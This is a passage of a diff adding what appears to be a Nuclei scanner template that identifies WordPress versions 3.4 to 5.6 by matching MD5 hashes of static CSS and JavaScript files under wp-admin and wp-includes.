"(\"318c49f14d9f92f62bb45641cb3f9eb5\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"9c72b817e54dfe7080be40b6228ac124\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"1b1f9ac48af85e1f98f078c7319a89a0\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"590bc741b3d9aeb5bc9f56b1aeaf6d52\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"1a1d016d4f1a1639a25c77b3f8c52615\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"183493ffd9bb469e92882434bb95f33c\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"1b074dccc9c4633fdbae077022442b88\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"950f64525286dae50d272b854cdf75d5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"ec55b9cd3fe27496afa458f46fefa6d3\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"751fe5c25fde6b4d3cbeadd98997c531\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"dfa6a9415541755284ed912ba66a47ba\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"393618e58a1aa37bc09cdef0ec54efb1\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"17bcc2c784960eece3c2447f28a66e58\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"4ea233ee70cb4a4630b7f886d19c2274\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"517ab56b0d531c6967cac1e0907dc5fa\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"55315f15e1e817ca3facd5ab6c18a4ee\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"1174ee5ac6181aca57cc6917e2b36075\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"e30255f4c7fea5413bcbf6181939bfbf\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"14f89cdca922d61b3ff683e5d627a025\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"94b9ad8dc1d37141fc0e27d256c50f86\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c18783da8db701a5cd308b6a3530563b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"99c9ad00cc0ea455e2c55d1870e5bf73\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-controls.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"8ae6ce2f95b8413264c6d072b909c620\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"c248a66d772f94a0476323e4d0515d15\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"1d8632e98daf0718d1b0998b432d48cc\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"e971354e52f09076124ee678685ba35d\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"6467380d6762f4bc5a86477a14b7dc4b\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"6ced0e37584c576effbc70c359d93acb\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"78f7aa6798d9b73385777e885e281438\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"f94aad7c60a799b4bf28b0e6ea0b0134\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"58091ac7639e586774b32895a7072e82\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"0a4145917ffe575d9772f4bf3b77fe89\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"6513e6580dd660824811aa7cf3420e54\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"7a40853c2c0e6cd539b666e46344b442\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"ad658adc879ba1db73141c9fa0b5c67d\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"86643ddd4df5737bd4590b16820edba7\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"2638c252972dda9814c5b7dfc1cc082c\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"1dddd9f80d54d907aa929e5961b6f623\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"3364a10ed6cf2020afca1aa446e3651a\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"a54850465f93f8b38c578f3d71fa2f81\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"06fbad1b88d31e111f1017966c27bd69\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"8c5c74220ca4d13347c89a0533cd3cff\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"56845933fa75808c849409235ad4766f\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"0753b59c6807bc3423580a933cc96b5e\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"efa336b5c252dc3db265c403b03a55e6\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2098c6561d5f3d6993b4eae437b87ab2\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-controls-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"005467044196b65cc61059a99d78c462\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"2bd099c199b51a2a222d0c87b8a791fa\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"9ca2f97b97f33e072814772948ad051a\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"07dd5ae0a8c519df86710b774937a1f5\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"884c2b6847465f6d6fc5c935b73bb65a\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"5f006e699026ed8e27eaa1e3718cbacb\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"2c67af9db85d688107d3f55599929ae1\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"1d0e5ded99e0c19c6deab1602412ad4d\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"1010da3327f8dcd8528c2bfd3ef0d962\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"09dbbe1689c1c4fc968e66c13bf20ac4\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"3f812ade9d1e4db4ccad691f78c0ef55\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"5cbdf14d7f60ad0eaecc133f000e299b\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"d7feb34b845f1fa5530a4c51d27bdab1\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"8d95686d540ea30f55dd8e2e722a25a3\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"2e0df4fceb8e32ab27b0d2c5572409b0\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"0d28e5955c3270df8748ab67de079876\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"9773dbbd9d575e3a0e0fc860a0e55d40\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d41557432736706066231f14c90effcf\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"21463e25a8cf85c82d861b2dec55238c\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"7ce7c610de77f1ad665964c41eb139ba\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"1fa7eb851c90dcc8a36840e23a715e00\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"2efb4f2640d7d938eb77a9772def851b\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9026be550edce0f7bacc680d1a557ba2\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6e1661adcd2e83ce04cf3d92987ee133\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/list-tables-rtl.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"703a6a20853140742564c197783d7574\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"52a6fde74e83e084947136f3028155ca\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"0e7d66c60fbc28b402c9360860a50db8\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"22bfd8378a0b60880169467965fd20f8\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"8af5643dc6458748de289b840a9916e5\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8396a236d1272256386e272432393aa6\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"559f9973411a9ffe7bfd93098392f82b\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"8d4a4692e68a588b456cf537bac52fb2\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"cb2e1d966b121d6b85775afab729a54a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"67d4038d41230db98678ddac36aa9239\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"ecf0ee06d97aef62adea7ba425ae7bee\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"0595bfc9b92f7a1e6357f6bec592451f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/list-tables.min.css" + matchers: + - type: dsl + name: 4.7 - 4.8.15 + dsl: + - "(\"1979a03e73de2bfe8aa90aad9ffd6073\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"1f20713b071e4fded3ca44cdc67e50c2\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"2a60bc6c16ed60d55fbb0dc830a7937f\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"55ae1e5716c2f3ef882b6b8736f04e09\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6a1898eda2575feefd20d8817a81610a\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"67c654457315f92d37621b68103aa4e2\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d0dc73dd54483a2fc4a1829b708df6b1\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"01f906ac3c792ad50368c3792bc1b913\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"34e87e0a7614057b453abd9373beeada\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"4443d19726d6c22f43a67891fc5748e0\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e9fc2b01496fd5fce09fbd8882e91e25\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2afbaaba8864509a66b1b8ed0e31aab3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-controls-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"ffafa3ca2a96904b59497dcd6e8d6c9a\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"ba5daf07137183c4710352df09d941f3\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"cdf5f4bb049f63d0c102eefe106595e5\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"d392c6caa0721b1787e24bf1250167b7\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"13d08a48b4ba814727ff90025d96572a\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"8a21a7e3cfb4d242c84b45135fc62072\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"ea3c70b45147963bb9bc33c09003abd2\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"27d9de08d110062db4c26b9fea3b21cc\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"633a6048309a6e23d4dedd9e62e65278\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"5651f0c5eb694d2d3aa9c1b3daa748fb\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"0fe38cfa9155e6f0ed9734b05dfd3710\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"1744d3c0da9ff689de20f91d783a84c1\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"6a01df682595d7c10ce1380a2faeab21\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"d919280b466eeb955ee3fe2bf88eac7c\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"cfecd2c2ab963773152a1366c81a1865\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"598c9f8efe6f61407ff4b43bd01d3139\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"314978fac5db55469bc5810682ca1827\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1595a6d7573e1ef0436a9fd704f40942\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"bbfad9e11ad15bf8bdf05eac0c2c13d1\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"f17bdc34919d5439aec151bf8b430dd0\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"ad52cf5c1455ee32967bfcbef32f0900\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"d5897b7031f90ae5e785dcb7a72f7ad6\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4b55fe3a2ab991f1f94af8178a78f17b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"19815334f12156cdd1f1e44e1e053b7c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-api.js" + matchers: + - type: dsl + name: 4.8.1 - 4.8.15 + dsl: + - "(\"9c031b4273a40cc1ff0b80be3d4723ca\" == md5(body))" + - type: dsl + name: 4.7.5 - 4.8 + dsl: + - "(\"fd75984f189d0a308e7f0fc70436e4eb\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.4 + dsl: + - "(\"3b8c124f3009a102041cb7cc70474ed8\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.2 + dsl: + - "(\"4cca1500e61bd40abe7b543fd76a5a06\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"2933e0915238937a85a3a6730a6959da\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"47fa0460e792c6f65c4321c66a02ed42\" == md5(body))" + - type: dsl + name: 4.9.5 - 4.9.16 + dsl: + - "(\"1b243f90dc8ec0cdb34d36d3cb92dcba\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"a035f4ac1a1b03b0221e038d9aea637e\" == md5(body))" + - type: dsl + name: 5.1 - 5.3.6 + dsl: + - "(\"4a2494492cfb02a215d3a171ee869028\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"66cd16f6c18c7dd52b5b7d2f38afef6e\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4c8b30fef77ad9532c3e38f7f578049e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"40bb4259dd66a68462fa6232af6cd0b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/customize-nav-menus-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"5223a4aba4cb80d393eae23c3ac03847\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"301312307914214b7a5a7bdae880a395\" == md5(body))" + - type: dsl + name: 4.7.1 - 4.7.3 + dsl: + - "(\"bf33fe1e46d08e362ea08a9cff9c428a\" == md5(body))" + - type: dsl + name: 4.7 + dsl: + - "(\"f47ee453000230a6e509e5eb09d21b53\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"4ef4d5630b4d01f400c1d2bf614aaae5\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"debbb450201d4f8b9d8097eb5d2f4984\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"7ac52f23f1a20c60ac3bd890e2a9ef5b\" == md5(body))" + - type: dsl + name: 4.3.2 - 4.3.25 + dsl: + - "(\"8a91eaac386e7d441d9041a3fcce3551\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.1 + dsl: + - "(\"bb16ef190fbd8dc23da6275b186e8ee3\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.1 + dsl: + - "(\"bef30601a17af3a107320f36b63ad35c\" == md5(body))" + - type: dsl + name: 4.9.2 - 5.0.11 + dsl: + - "(\"1bf381b227fd0f82983f7f42bfee09e2\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6f447f8805670fe9f8af96001a9e2e6e\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"891c337677bb836662e8301d9be94544\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"24f60068c92a427fb866616ab3d50b45\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4b678d3cd57cec4d2e58abf0753dd5f8\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"75d679e763f75d392154374ed55b4745\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/editor/editor-styles-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"47ef28d2a0a9d167122d09934271de03\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"79c1be42159b20caedcc56a8ddff41ca\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8977b727a799ed3a59692b81e46302fe\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"e0a81847317281768696a4235ae81a9b\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"7e9ec40c4bbfad6d8639bae47dc20971\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"23dad8691685cbf1e30c00812a03c20b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c7e4b9ae15ba4cf51bcf2915d00c1bca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/editor/editor-styles.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"47ef28d2a0a9d167122d09934271de03\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"79c1be42159b20caedcc56a8ddff41ca\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8977b727a799ed3a59692b81e46302fe\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"e49bd1a6378d486ab9dfd8ee73e5c185\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"8fa1e9aeea65384be3e4519e5e89e99c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"7667c530a7dec4836115d4114aedf41e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a9a8570f751efd8b473156a5e4f99812\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/theme-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"c05ede63e9bfee178e4307ae1b6d6075\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"d3f34daa69b2ac3bf8a346f574a588d6\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"765597c3d810bb018d92c6c402830ee1\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"d957340764df5851005f336311a87847\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"1cd9fb2cd523d2d87e16057d2c86bf72\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4125aeb22a82ba5c411416c3f074b956\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"711f173f6b717396bfdd8900a48eb82e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-library/theme.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"48943d583062427bd919c60005f397b3\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"498c8501c2c4b1d56968fb2340da8d6e\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8f30cb2e9f32a20cf62ff9d398ffd370\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"9a91ffe53383c017e8ee528fe876be37\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"557f9554d0253d59faffc62ddf5d443a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f33467abe97afabe4e76914e9904cd3e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"261b286370e6ebf2fea391d7b5992b82\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/format-library/style-rtl.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"11c31e9d289b83b5e77d72bac6727f8a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ca3d97822c24a367cdd7a5dbb89aa3e7\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"e083f88ed372b2060f14fba501cfabc3\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"963b64cb0a578fa061771df545c01d24\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"17ec8f8aeb2e2def5d1ebb954866c8b1\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d6b3349458d04440394db83f8b5619c2\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3ceee3748d9e98acadbe2d5dd9157616\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/format-library/style.css" + matchers: + - type: dsl + name: 5.0 - 5.1.8 + dsl: + - "(\"11c31e9d289b83b5e77d72bac6727f8a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ca3d97822c24a367cdd7a5dbb89aa3e7\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"e083f88ed372b2060f14fba501cfabc3\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"cfd4cd3bcc251178896d6309b3bf16e3\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"9bec0aed392a71368af11b9d7c9924d9\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"973d49151bf1c6114103b255fe9bf541\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3b2d84d9a95082cccac3fa29cdd456ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-directory/style-rtl.css" + matchers: + - type: dsl + name: 5.4 + dsl: + - "(\"17083b7c4730dff09fa65894ee2614ff\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"58e2636e4747d7e549bd747542807dc4\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"54c87680ee00548dda2ac73d8bdfc089\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"ba2c227c69ec307dc4314b1a47e30e7b\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-directory/style.css" + matchers: + - type: dsl + name: 5.4 + dsl: + - "(\"7a6efade7acf587267923b9f9c7e9642\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"8bd1e8ce2c01b7819514b62b6d181c0f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"a9bd170afe04ea21dc5660bb612cf41e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"aef5b98fce25d6cb0618916949709a3a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/media.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"85c2128be6063d7c56e7a6db37e5fe3a\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"31bb9d767dc660883cbe4f139d4a1594\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"e51791f375ab1b37bc6a6b909117751b\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"d714e213588655321600965226ddc90d\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"7ba8bad309cb85ad9bf541efd9125d50\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"c997f050f7bb25caf1818ea0f28ed4a4\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"e59229c4367889a9e11bf73a24322a21\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"678153b11dc1519f52d1d8272b3a3dda\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"60ec435acce0172de2eb1e32604be34d\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"ecf181b81b6a1013ac735cc5e7e93214\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.1 + dsl: + - "(\"356a27e870aa3c5e65150b03612edecc\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"8ebfa134dd4947ee27a27dc92096f8dc\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"fab4fc4dd4ac53e5cf57a9a34553b3f6\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.2 + dsl: + - "(\"31a66201ba16acb7f87720cbb4f2ee90\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"e1f6d60bbad12bbb2b3e4237dc429445\" == md5(body))" + - type: dsl + name: 5.3.3 - 5.3.6 + dsl: + - "(\"5a548eab236ffc874cb30cf285096c3d\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"dbd90a61312819a8356cfb4fe41017eb\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"416650f0eda7575e5b0c47c9002a88aa\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/media-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"62c7ce65509dfa3104449d4ddc09fa63\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"de0809f2c9675d09fe4f48b617a7e6a1\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"b13c8ab17b4b40a41ed606a6260c8a45\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"961e427859db7e72579d43e9180f75ac\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"c05627fb8b23d03a493634aea897fbb3\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"a3f07d2e699aff8d66db9352172f3c41\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"ed3c2887d54cf6fb64f55b03413502d0\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"3b139483643b8769ec041e86142f0b0c\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"f9b551130b9b64f5b772faf8601bd0b9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.1 + dsl: + - "(\"0fade283565e4a3ce4ec55de896791ed\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"5b46ede1ee578828803f29bad065bd2a\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - 